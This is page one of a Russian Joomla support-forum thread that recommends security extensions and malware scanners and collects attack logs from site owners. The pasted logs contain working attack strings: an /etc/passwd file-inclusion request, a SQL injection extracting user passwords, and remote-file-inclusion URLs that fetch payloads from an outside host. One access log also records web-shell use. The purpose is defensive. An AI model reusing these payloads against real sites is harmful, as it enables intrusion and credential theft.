Форум русской поддержки Joomla!® CMS
04.12.2016, 14:18:45 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 20   Вниз
  Добавить закладку  |  Печать  
Автор

Компоненты и скрипты для защиты сайта. Логи атак на сайты

 (Прочитано 168106 раз)
0 Пользователей и 2 Гостей смотрят эту тему.
wishlight
Профи
********

Репутация: +200/-1
Offline Offline

Пол: Мужской
Сообщений: 3476


skype aqaus.com


« : 06.01.2012, 15:28:43 »

========================================================
От модератора:

1. Логи выкладывайте строго под спойлер!

2. Запрещено цитировать сообщения целиком. Цитируя, апеллируйте к конкретной фразе.


========================================================

Обновлено 01.10.2014 - обновлены скрипты и некоторая информация.

Здесь я собрал ссылки на понравившиеся мне расширения по защите сайтов. Это мало касается правильной защиты сервера, на котором расположены сайты. Необходимо следить за тем, чтобы программное обеспечение сервера было актуальным, без уязвимостей и правильно настроенным. В любом случае на шаред хостингах за вас это должен делать хостер. На своем сервере без "расширенного администрирования" вы сами отвечаете за безопасность.

Вы можете обратиться ко мне для лечения вашего сайта, если у вас есть в этом необходимость.

Контакты:
Показать текстовый блок

Еще сюда вы можете выложить лог атаки на ваш сайт или что либо еще, что может быть полезным для сообщества.

Ниже представлена информация по теме:

Securitycheck - Бесплатный firewall который пишет логи + возможность проверки расширений Joomla на уязвимость. Мне понравился. Устанавливаем и он уже готов к работе.

Еще есть 2 плагина которые защищают от некоторых типов попыток взлома Joomla. Так же они пишут логи. Теоретически они способны предотвратить неизвестную атаку (Так же создать кучу проблем с работой компонентов. В таком случае их можно выключить или попробовать другой).

Marco's SQL Injection - отсылает письма с логом атаки.

и

jHackGuard -пишет лог в logs/jhackguard-log.php

jHackGuard требует регистрации для загрузки. Архивы с плагином выложил в прикрепленных файлах. Выложена версия 1.4.1. В 1.4.2 есть некоторые требования для хостинга, то есть он не везде работает корректно.

Как их настроить:

Securitycheck
Показать текстовый блок

Marco's SQL Injection
Показать текстовый блок

jHackGuard
Показать текстовый блок

Вполне возможно поможет в борьбе с уязвимостями.

Вместе вроде работают без проблем.

Также можно обратить внимание на эти расширения из раздела SITE PROTECTION каталога расширений Joomla.

Показать текстовый блок

Снизу случайные примеры.

Логи доступа посложнее будет просмотреть, чем эти.

Отдельное спасибо авторам плагинов.

AI-Bolit — это уникальный бесплатный скрипт для поиска вирусов, троянов, backdoor, хакерских активностей на хостинге. Действительно один из лучших из бесплатных.
Показать текстовый блок
Сканер поиска Shell and BackDoor - отдельное спасибо flyingspook

Его же новый сканер, имеющий платную и бесплатную версии, но и в бесплатной уже более широкий функционал.
Показать текстовый блок
Скрипт удаления вредоносного кода от icom
Показать текстовый блок
AVPTool - утилита от Касперского. Хорошо ищет шеллы в бекапах и  вирусы на вашем пк.

Если вдруг вы не можете зайти на сайты антивирусов, то AVPTool скачать можно отсюда.

Дополнительные расширения для защиты сайта от спама, флуда и атак админок:

Admin Tools - имеет множество функций в том числе защита дополнительным паролем каталога администратора с помощью .htaccess
Показать текстовый блок

EasyCalcCheck PLUS - плагин предназначенный для борьбы со спамом на вашем сайте. Возможно подключать несколько типов CAPTCHA (реCAPTCHA, цифровая CAPTCHA), блокирование активности ботов по правилам пользователя, службы типа Akismet для фильтрации спама, скрытие админки и базовая защита от атак. Поддерживается интеграция со сторонними компонентами.
Показать текстовый блок

Некоторые файлы пришлось выложить на Яндекс.Диск в связи с правилами форума.

jHackGuard для версии Joomla 2.5
jHackGuard для версии Joomla 1.5
Зеркало для загрузки скрипта для поиска вредоносного кода AI-Bolit

Патч Joomla 1.5.26 [#31626] Unauthorized file upload security issue/Несанкционированная загрузка файлов. Распаковать и залить поверх обновленной Joomla 1.5.26 по ftp.

Напишите мне, если необходимо что-нибудь добавить или вы нашли ошибку.

У многих на странички с текстом вредоносного кода ругается антивирус. В этом случае можно сделать скриншот кода на этом сервисе:

Конвертер кода в изображение

Сервис годится для любых текстов. Для примера выложил отчет Marco's SQL Injection, хотя на него антивирус ругаться не будет:

Показать текстовый блок
« Последнее редактирование: 01.10.2014, 19:10:03 от wishlight » Записан
 
wishlight
Профи
********

Репутация: +200/-1
Offline Offline

Пол: Мужской
Сообщений: 3476


skype aqaus.com


« Ответ #1 : 06.01.2012, 15:33:23 »

Пример:

Marco's SQL Injection лог



** Local File Inclusion [GET:amp;controller] => ../../../../../../../../../../etc/passwd\0
** Local File Inclusion [REQUEST:amp;controller] => ../../../../../../../../../../etc/passwd\0

**PAGE / SERVER INFO


*REMOTE_ADDR :
94.179.198.35

*HTTP_USER_AGENT :
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7

*REQUEST_METHOD :
GET

*QUERY_STRING :
option=com_juliaportfolio&controller=../../../../../../../../../../etc/passwd%00



** SUPERGLOBALS DUMP (sanitized)


*$_GET DUMP
 -[option] => com_juliaportfolio
 -[amp;controller] => ../../../../../../../../../../etc/passwd\0


*$_POST DUMP


*$_COOKIE DUMP
 -[d13f04353066f3ab4ccbafe0dc6fa697] => 72a07f922bcb46f8318026fabc3982b4
 -[__utma] => 66701246.1816384113.1325848141.1325848141.1325848141.1
 -[__utmb] => 66701246.4.10.1325848141
 -[__utmc] => 66701246
 -[__utmz] => 66701246.1325848141.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)


*$_REQUEST DUMP
 -[option] => com_juliaportfolio
 -[amp;controller] => ../../../../../../../../../../etc/passwd\0
 -[d13f04353066f3ab4ccbafe0dc6fa697] => 72a07f922bcb46f8318026fabc3982b4
 -[__utma] => 66701246.1816384113.1325848141.1325848141.1325848141.1
 -[__utmb] => 66701246.4.10.1325848141
 -[__utmc] => 66701246
 -[__utmz] => 66701246.1325848141.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)




« Последнее редактирование: 25.12.2012, 11:39:20 от wishlight » Записан
wishlight
Профи
********

Репутация: +200/-1
Offline Offline

Пол: Мужской
Сообщений: 3476


skype aqaus.com


« Ответ #2 : 06.01.2012, 15:34:18 »

Пример:

jHackGuard

2012-01-06   11:12:51   INFO   ::1   -   Changed GET value from:     -9999 UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from jos_users/* to:    -9999  SELECT 1,(username,0x3a,password),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from /*

« Последнее редактирование: 06.01.2012, 15:37:39 от wishlight » Записан
Langoliers
Завсегдатай
*****

Репутация: +67/-2
Offline Offline

Пол: Мужской
Сообщений: 693


Если б Я изучал людей, то был бы паразитологом


« Ответ #3 : 06.01.2012, 16:31:10 »

Спасибо! Буду пробовать настроить Marco's SQL Injection. Уже давно хотел заняться этим вопросом.
З.Ы. в заголовок темы очепятка прокралась. "выкладывать" будет правильнее Azn
« Последнее редактирование: 06.01.2012, 18:43:51 от Langoliers » Записан
Langoliers
Завсегдатай
*****

Репутация: +67/-2
Offline Offline

Пол: Мужской
Сообщений: 693


Если б Я изучал людей, то был бы паразитологом


« Ответ #4 : 06.01.2012, 18:55:27 »

От себя добавлю: при включении плагина Marco's SQL Injection проследите за приложениями, которые отправляют любые запросы "за пределы сайта" такие как модуль Twitter, плагин Social Share Buttons и т.п.
Если настройки плагина были по умолчанию, то подобные расширения работать не будут, нужно будет внести их в список игнорируемых.
Записан
wishlight
Профи
********

Репутация: +200/-1
Offline Offline

Пол: Мужской
Сообщений: 3476


skype aqaus.com


« Ответ #5 : 06.01.2012, 20:29:37 »

У меня все отлично в этом плане. Стоит ValAddThis plugin и все отправляется. Настроено именно так, как на картинке.

Может тему закрепить? К модераторам.
« Последнее редактирование: 06.01.2012, 20:45:34 от wishlight » Записан
Langoliers
Завсегдатай
*****

Репутация: +67/-2
Offline Offline

Пол: Мужской
Сообщений: 693


Если б Я изучал людей, то был бы паразитологом


« Ответ #6 : 06.01.2012, 20:44:53 »

А у меня как раз таки ошибки посыпались с модуля твиттера и Social Share Buttons v1.3 =\

И кстати твиттер не модуль для джумлы, а подключенно в модуль HTML через API твиттера

И вот обнаружил что уже есть версия 1.4 плагина Social Share Buttons. ща поставлю и погляжу что будет
« Последнее редактирование: 06.01.2012, 21:02:14 от Langoliers » Записан
wishlight
Профи
********

Репутация: +200/-1
Offline Offline

Пол: Мужской
Сообщений: 3476


skype aqaus.com


« Ответ #7 : 06.01.2012, 20:46:11 »

А что за ошибки?
Записан
oriol
Живу я здесь
******

Репутация: +100/-4
Offline Offline

Сообщений: 1057


« Ответ #8 : 06.01.2012, 22:25:50 »

wishlight
А тебе этот парень с Казани часто в логах попадается ?

IP 94.180.136.142
а бот  Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Записан
Langoliers
Завсегдатай
*****

Репутация: +67/-2
Offline Offline

Пол: Мужской
Сообщений: 693


Если б Я изучал людей, то был бы паразитологом


« Ответ #9 : 06.01.2012, 23:31:13 »

А что за ошибки?
У меня теперь новая проблема =( http://joomlaforum.ru/index.php/topic,196020.0.html
Записан
wishlight
Профи
********

Репутация: +200/-1
Offline Offline

Пол: Мужской
Сообщений: 3476


skype aqaus.com


« Ответ #10 : 07.01.2012, 01:32:37 »

Прикрепил

Спасибо
Записан
wayn
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 67


« Ответ #11 : 07.02.2012, 13:37:25 »

У меня так ваще странная ситуация. Изначально была проблема с зараженными файлами типа base64_decode(. Обсуждалась здесь. Вроде скриптом ве подобрал, удалил. Жалоб нет.

На второй хостинг площадке (уже с другими сайтами) была таже проблема. Вроде тоже все вылечил. Все нормально было "пока". Вскоре обнаруживаю что аккаунт хостинка рубанули. Позвонил, сказали что от меня шлется спам. Причем ломали именно не основной домен хостинга, а дополнительный. На сайте были установлены только JoomShopping, его брал с их оффсайта. Спам слал сломанный файл конфигурации. Вот он.

Снес. Поставил все заного. Через несколько дней опять тоже самое. Еще и появились какие-то странные файлы весом 50-100 кб. Опять снес, пароли поменял. Поставил просто Joomla, взятую с Joomla.ru версия 1.5.25. Через несколько часов началось опять что-то непонятное. В папке logs появилась какая-то папка easywebsoc.td.com и кто-то реально ломится. Что делать не знаю. Заказ весит. Времени нет. Даже работать нормально не получается. Где дыра не понятно.

Логи не знаю где брать. Брал с хостинг панели. Т.е. основная атака идет именно на папку star.

Показать текстовый блок
Записан
wayn
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 67


« Ответ #12 : 07.02.2012, 13:52:45 »

До сих пор долбят какой-то файл anz.html в папке с компонентами. Я аж JoomShopping боюсь ставить. Подскажите как влияют на уязвимость права на папки в опциях Joomla, т.е. доступные на запись?
Записан
oriol
Живу я здесь
******

Репутация: +100/-4
Offline Offline

Сообщений: 1057


« Ответ #13 : 07.02.2012, 14:55:31 »

У меня это выглядит так

Показать текстовый блок

« Последнее редактирование: 07.02.2012, 16:16:25 от oriol » Записан
wayn
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 67


« Ответ #14 : 07.02.2012, 17:14:03 »

Тоже решил поставить на configuration.php права 444. Просто интересно откуда зараза эта лезит. Часов 5 пустая Joomla весит вроде пока ничего.
Записан
flyingspook
Moderator
*****

Репутация: +226/-9
Offline Offline

Сообщений: 3525


« Ответ #15 : 07.02.2012, 19:34:33 »

Цитировать
Просто интересно откуда зараза эта лезит
из дверей если не удалили  Wink
Записан
wayn
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 67


« Ответ #16 : 07.02.2012, 21:31:50 »

Поставил все, подчистил снова. По совету oriol также установил Eyesite. Пока полет нормальный. Бэкапы просканировал AVPTool, вроде все чисто. Ждем.
Записан
goodtm
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Сообщений: 13


« Ответ #17 : 25.02.2012, 23:29:19 »

Привет
Вот такие запросы в своих логах обнаружил
Вроде точно такие же запросы и с 207.20.226.122, 192.167.9.177

Показать текстовый блок
« Последнее редактирование: 25.02.2012, 23:44:00 от goodtm » Записан
wishlight
Профи
********

Репутация: +200/-1
Offline Offline

Пол: Мужской
Сообщений: 3476


skype aqaus.com


« Ответ #18 : 26.02.2012, 00:06:42 »

Перебор путей в надежде найти что-то интересное.
Записан
Langoliers
Завсегдатай
*****

Репутация: +67/-2
Offline Offline

Пол: Мужской
Сообщений: 693


Если б Я изучал людей, то был бы паразитологом


« Ответ #19 : 26.02.2012, 10:12:54 »

Протестил Marco's SQL Injection. Провел серию атак на свой сайт. Кое что блокировал... Так скажем 50%. И прислал логи на почту. Часть не допустил htaccess, еще часть firewall на сервере. Так что в совокупности пробить не получилось... Использовал базу уязвимостей OWASP.
Так что расширение довольно полезное... И не грузит систему, как некоторые компоненты "фаерволлов"
Записан
Langoliers
Завсегдатай
*****

Репутация: +67/-2
Offline Offline

Пол: Мужской
Сообщений: 693


Если б Я изучал людей, то был бы паразитологом


« Ответ #20 : 26.02.2012, 11:08:40 »

Admin Tools, кто нибудь юзал? Какие функции вообще выполняет?
Записан
usemind
Осваиваюсь на форуме
***

Репутация: +4/-0
Offline Offline

Пол: Мужской
Сообщений: 33



« Ответ #21 : 05.03.2012, 19:46:16 »

Date   Time   Cause   IP   Name   User agent   Request method   Request URI   Comment
2012-03-03   14:32:10   Image file name with command in URL   218.188.39.33   218.188.39.33   Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)   GET   /%D0%9F%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC%D1%8B/%D0%98%D0%BD%D1%82%D0%B5%D1%80%D0%BD%D0%B5%D1%82/AppServ-%D0%BB%D0%B5%D0%B3%D0%BA%D0%B8%D0%B9-%D1%81%D1%82%D0%B0%D1%80%D1%82-%D0%B4%D0%BB%D1%8F-web-%D1%80%D0%B0%D0%B7%D1%80%D0%B0%D0%B1%D0%BE%D1%82%D1%87%D0%B8%D0%BA%D0%B0/appserv/main.php?appserv_root=http://kalyanpgcollege.org/portal/images/core/define/php/spread.txt??   
2012-03-03   14:32:12   Image file name with command in URL   218.188.39.33   218.188.39.33   Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)   GET   /%D0%9F%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC%D1%8B/%D0%98%D0%BD%D1%82%D0%B5%D1%80%D0%BD%D0%B5%D1%82/AppServ-%D0%BB%D0%B5%D0%B3%D0%BA%D0%B8%D0%B9-%D1%81%D1%82%D0%B0%D1%80%D1%82-%D0%B4%D0%BB%D1%8F-web-%D1%80%D0%B0%D0%B7%D1%80%D0%B0%D0%B1%D0%BE%D1%82%D1%87%D0%B8%D0%BA%D0%B0/appserv/main.php?appserv_root=http://kalyanpgcollege.org/portal/images/core/define/php/pintery.txt??   
2012-03-03   14:32:16   Image file name with command in URL   218.188.39.33   218.188.39.33   Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)   GET   /appserv/main.php?appserv_root=http://kalyanpgcollege.org/portal/images/core/define/php/spread.txt??   
2012-03-03   14:32:18   Image file name with command in URL   218.188.39.33   218.188.39.33   Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)   GET   /appserv/main.php?appserv_root=http://kalyanpgcollege.org/portal/images/core/define/php/pintery.txt??   
2012-03-03   14:32:22   Image file name with command in URL   218.188.39.33   218.188.39.33   Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)   GET   /%D0%9F%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC%D1%8B/%D0%98%D0%BD%D1%82%D0%B5%D1%80%D0%BD%D0%B5%D1%82/appserv/main.php?appserv_root=http://kalyanpgcollege.org/portal/images/core/define/php/spread.txt??   
2012-03-03   14:32:24   Image file name with command in URL   218.188.39.33   218.188.39.33   Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)   GET   /%D0%9F%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC%D1%8B/%D0%98%D0%BD%D1%82%D0%B5%D1%80%D0%BD%D0%B5%D1%82/appserv/main.php?appserv_root=http://kalyanpgcollege.org/portal/images/core/define/php/pintery.txt??   

http://kalyanpgcollege.org/portal/images/core/define/php/spread.txt

05.03.2012 17:45:28   Real-time file system protection   file   C:\Users\///\AppData\Local\Opera\Opera\cache\g_0053\opr0QX0U.tmp   PHP/IRCBot.NAA trojan   cleaned by deleting - quarantined   ////   Event occurred on a file modified by the application: C:\Program Files (x86)\Opera\opera.exe.
Записан
flyingspook
Moderator
*****

Репутация: +226/-9
Offline Offline

Сообщений: 3525


« Ответ #22 : 05.03.2012, 20:14:49 »

хороший зверь!
Записан
Иван
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 51


« Ответ #23 : 09.03.2012, 18:50:26 »

Добрый день.
Обнаружил у себя недавно такое:
Код:
188.165.125.51 - - [27/Feb/2012:23:50:45 +0200] "POST /cgi-bin/test.pl HTTP/1.1" 200 9215 "http://www.мойсайт.com.ua/cgi-bin/test.pl" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:07 +0200] "POST /images/f.php HTTP/1.1" 200 2933 "http://www.мойсайт.com.ua/images/f.php" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:50:40 +0200] "GET /cgi-bin/test.pl HTTP/1.1" 200 133 "-" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:50:48 +0200] "POST /cgi-bin/test.pl HTTP/1.1" 200 6850 "http://www.мойсайт.com.ua/cgi-bin/test.pl" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:09 +0200] "POST /images/f.php HTTP/1.1" 200 2950 "http://www.мойсайт.com.ua/images/f.php" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:00 +0200] "GET /images/f.php HTTP/1.1" 200 4878 "-" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:50:39 +0200] "GET /cgi-bin/test.pl HTTP/1.1" 301 244 "-" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:25 +0200] "POST /images/f.php HTTP/1.1" 200 2879 "http://www.мойсайт.com.ua/images/f.php" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:11 +0200] "POST /images/f.php HTTP/1.1" 200 4886 "http://www.мойсайт.com.ua/images/f.php" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:50:53 +0200] "POST /cgi-bin/test.pl HTTP/1.1" 200 6970 "http://www.мойсайт.com.ua/cgi-bin/test.pl" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:16 +0200] "POST /images/f.php HTTP/1.1" 200 5945 "http://www.мойсайт.com.ua/images/f.php" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:42 +0200] "POST /images/f.php HTTP/1.1" 200 3300 "http://www.мойсайт.com.ua/images/f.php" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:32 +0200] "POST /images/f.php HTTP/1.1" 200 5967 "http://www.мойсайт.com.ua/images/f.php" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:54 +0200] "GET /site/ HTTP/1.1" 200 5643 "-" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:55 +0200] "GET /site/page_files/pyeytnvo94318.gif HTTP/1.1" 200 2063 "http://www.мойсайт.com.ua/site/" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:54 +0200] "GET /site/page_files/rwlwupzl1191.css HTTP/1.1" 200 1195 "http://www.мойсайт.com.ua/site/" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:55 +0200] "GET /site/page_files/cx4clzwzsqjs1142.gif HTTP/1.1" 200 1104 "http://www.мойсайт.com.ua/site/" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:38 +0200] "POST /images/f.php HTTP/1.1" 200 3183 "http://www.мойсайт.com.ua/images/f.php" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:55 +0200] "GET /site/page_files/hsipikncqy5395.gif HTTP/1.1" 200 1936 "http://www.мойсайт.com.ua/site/" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:46 +0200] "POST /images/f.php HTTP/1.1" 200 3364 "http://www.мойсайт.com.ua/images/f.php" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"

Каком образом это произошло - украли пароли?
Есть этот файл test.pl
Его выкладывать или как?
Записан
wishlight
Профи
********

Репутация: +200/-1
Offline Offline

Пол: Мужской
Сообщений: 3476


skype aqaus.com


« Ответ #24 : 09.03.2012, 18:56:30 »

Желательно код выложить, пригодится для разборки людям на форуме.
Записан
Иван
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 51


« Ответ #25 : 09.03.2012, 20:49:42 »

Код файла cgi-bin/test.pl
Показать текстовый блок
« Последнее редактирование: 09.03.2012, 21:00:00 от Иван » Записан
Иван
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 51


« Ответ #26 : 09.03.2012, 21:02:26 »

Код файла images/f.php
Показать текстовый блок
Записан
Иван
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 51


« Ответ #27 : 09.03.2012, 21:06:22 »

И еще нашел старый файл -includes/domit/domit.php,чисто случайно (поискал строчку из предыдущего файла (поиск-x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\)
Показать текстовый блок
Записан
Иван
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 51


« Ответ #28 : 09.03.2012, 21:11:07 »

Может у кого есть мнения. Откуда и как оно пролезло. Если украли пароли, то это както спокойней. А если уязвимость, то хрен я ее найду - из знаний только дедуктивный метод тыка
Записан
Saber
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 55


« Ответ #29 : 15.03.2012, 09:42:34 »

У меня выделенный сервер, на нём десятка 2-3 сайтов на разных ЦМС

во всех сайты массово начали ломиться боты.
Сервер вроде настроен неплохо что потеря одного сайта не отразится на остальных, все в изолированных песочницах.



Вот к WP










к чему всё это.
до этого у меня был сервер где небыло песочниц для каждого сайта и подобрал пароль к одному сайту чуваки установили модуль.

mod_system в котором был обычный phpShell с этого шела достали все остальные сайты и где в шаблон где в сам сайт понафигачили всякой херни...

но вижу что примерно с 1-3го марта боты сильно активихированись или на нулледе или на античате видимо выложили каокй-то скрпит или что что подбирает пароли..

в общем нужен плагин или модуль что при 3х попытках выводит капчу
Записан
Страниц: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 20   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet